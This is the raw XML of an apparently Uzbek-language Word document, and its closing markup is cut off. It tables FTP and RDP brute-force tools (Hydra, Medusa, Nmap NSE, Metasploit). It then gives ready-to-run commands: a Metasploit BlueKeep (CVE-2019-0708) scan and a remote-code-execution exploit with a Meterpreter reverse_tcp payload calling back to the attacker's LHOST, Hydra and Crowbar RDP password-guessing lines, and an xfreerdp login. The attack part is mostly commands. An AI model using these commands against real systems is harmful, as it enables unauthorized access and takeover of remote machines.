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D0181" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5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900"/>
        <w:gridCol w:w="1455"/>
        <w:gridCol w:w="1995"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="945"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB5630" w14:paraId="1637542C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1665"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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DF8D0C" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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307BB" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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C933D" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="a6"/>
              <w:tblW w:w="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FB5630" w14:paraId="4ADCCD2A" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="3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676939D7" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="13B798DB" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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Style w:val="a7"/>
              <w:tblW w:w="11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55"/>
            </w:tblGrid>
            <w:tr w:rsidR="00FB5630" w14:paraId="2B1E2F28" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1020"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="11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56FBFD0" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EED">
                  <w:pPr>
                    <w:spacing w:before="24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FTP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File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Transfer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Protocol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4003EBE5" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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D8C47" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED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FTP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tizimlariga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kirish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login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parolni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brute-force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qilish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B62B2" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EE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Hydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30863DE0" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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FASTRDP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dastur</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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0093EB" w14:textId="0A9FFE30" w:rsidR="00FB5630" w:rsidRDefault="00FB563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B5630" w14:paraId="429529A1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1665"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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DF7E" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/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ED7DD" w14:textId="77777777" w:rsidR="00FB5630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RDP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C1321" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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RDP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Desktop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Protocol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6844C" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED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Microsoft RDP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xizmatlariga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login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credentiallarini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sinash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E3101" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EE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Hydra -l admin -P /path/to/password_list.txt rdp://192.168.1.100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22FA9B3A" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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FASTRDP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dastur</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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CBD4" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB5630" w14:paraId="34CA9AB5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1665"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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AE65F" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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4B608" w14:textId="77777777" w:rsidR="00FB5630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FTP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843EB" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="a8"/>
              <w:tblW w:w="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FB5630" w14:paraId="5CCBFB0C" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="3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87287AD" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="186AD74D" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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Style w:val="a9"/>
              <w:tblW w:w="11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55"/>
            </w:tblGrid>
            <w:tr w:rsidR="00FB5630" w14:paraId="00DD2DDC" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1020"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="11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5D25394" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EED">
                  <w:pPr>
                    <w:spacing w:before="24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FTP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File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Transfer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Protocol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40350346" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/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B70AB" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED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FTP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tizimlariga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kirish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login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parolni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brute-force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qilish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E2611" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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medusa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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F71AC4" w14:textId="0C253647" w:rsidR="00FB5630" w:rsidRDefault="00FB563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B5630" w14:paraId="167F5926" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1665"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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F2DC" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/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ACB58" w14:textId="77777777" w:rsidR="00FB5630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RDP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D7DE9C" w14:textId="77777777" w:rsidR="00FB5630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RDP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Desktop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Protocol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3F93E" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED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Microsoft RDP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xizmatlariga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login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credentiallarini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sinash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D6895" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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medusa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="945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0AA6" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB5630" w14:paraId="3A9D9DFC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1665"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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BCE4A" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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5AB4C" w14:textId="77777777" w:rsidR="00FB5630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FTP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96836" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="aa"/>
              <w:tblW w:w="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FB5630" w14:paraId="6F1AFB13" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="3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25FC525" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="791EF18C" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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Style w:val="ab"/>
              <w:tblW w:w="11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55"/>
            </w:tblGrid>
            <w:tr w:rsidR="00FB5630" w14:paraId="428E17CD" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1020"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="11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33258C8F" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EED">
                  <w:pPr>
                    <w:spacing w:before="24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FTP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File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Transfer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Protocol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6033E2BF" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/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E99F8" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED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FTP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tizimlariga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kirish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login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parolni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brute-force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qilish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59E1B" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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NSE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skriptlari</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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F3192" w14:textId="5005DE12" w:rsidR="00FB5630" w:rsidRDefault="00FB563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B5630" w14:paraId="7CCC029C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1665"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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8E42" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/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85F49" w14:textId="77777777" w:rsidR="00FB5630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RDP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C16CF" w14:textId="77777777" w:rsidR="00FB5630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RDP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Desktop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Protocol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93F240" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED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Microsoft RDP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xizmatlariga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login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credentiallarini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sinash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C12CB6" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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Nmap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NSE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skriptlari</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="945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0315" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB5630" w14:paraId="7F5AE6DB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1665"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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D0D8A" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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D2C24" w14:textId="77777777" w:rsidR="00FB5630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FTP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34614" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="ac"/>
              <w:tblW w:w="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FB5630" w14:paraId="15CDF02C" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="3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CC467C5" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1883885A" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EED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tbl>
            <w:tblPr>
              <w:tblStyle w:val="ad"/>
              <w:tblW w:w="115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55"/>
            </w:tblGrid>
            <w:tr w:rsidR="00FB5630" w14:paraId="298FBFB8" w14:textId="77777777">
              <w:trPr>
                <w:trHeight w:val="1020"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="11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912994C" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EED">
                  <w:pPr>
                    <w:spacing w:before="240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FTP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File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Transfer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Protocol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0ABAB7C9" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/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294780" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED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FTP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tizimlariga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kirish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login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parolni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brute-force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qilish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8DD28" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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Metasploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="94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91156" w14:textId="213381C3" w:rsidR="00FB5630" w:rsidRDefault="00FB563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B5630" w14:paraId="757EB3BE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1665"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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5EDC" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/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F0F23" w14:textId="77777777" w:rsidR="00FB5630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RDP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49D2A" w14:textId="77777777" w:rsidR="00FB5630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RDP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Desktop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Protocol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E1A04" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED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Microsoft RDP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xizmatlariga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login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credentiallarini</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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D4E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sinash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8E96A" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EE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Metasploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="945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58CF" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="00FB5630"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18C28938" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16F34B" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRDefault="001D4EED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EXPLOIT  YORDAMIDA ISHLATISH UCHUN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D808F29" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yordamida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BlueKeep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zaifligini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tekshiris</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28010F1B" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAD5846" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54204A9F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use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/cve_2019_0708_bluekeep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DBA3C1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set RHOSTS &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062615D5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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E204373" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C88006" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Agar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tizim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zaif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bo‘lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ekspluatatsiya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qilish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uchun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quyidagilarni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ishlatish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mumkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E439BA" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02875C5B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use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/cve_2019_0708_bluekeep_rce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEEC2FC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set RHOSTS &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBB12AA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set PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02C801CB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set LHOST &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>your_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF969F0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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746207EF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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD7544E" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CA3789" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C15EB6" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5B1ABA" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">HYDRA </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yordamida</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> brute force </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qilish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="051D044D" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453AB053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hydra -L users.txt -P passwords.txt rdp://&lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B3C63" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339892CF" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F44D7F3" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Crowbar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bilan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RDP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bruteforce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qilish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F1D93CB" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CBB98CD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 xml:space="preserve">crowbar -b </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; -u admin -C passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E1EA4E" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE699A9" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45A1D4BE" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6B4986" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux terminal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>orqali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RDP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ulanish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AF084FA" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282A48DB" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /v:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; /u:&lt;username&gt; /p:&lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7939D1E5" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
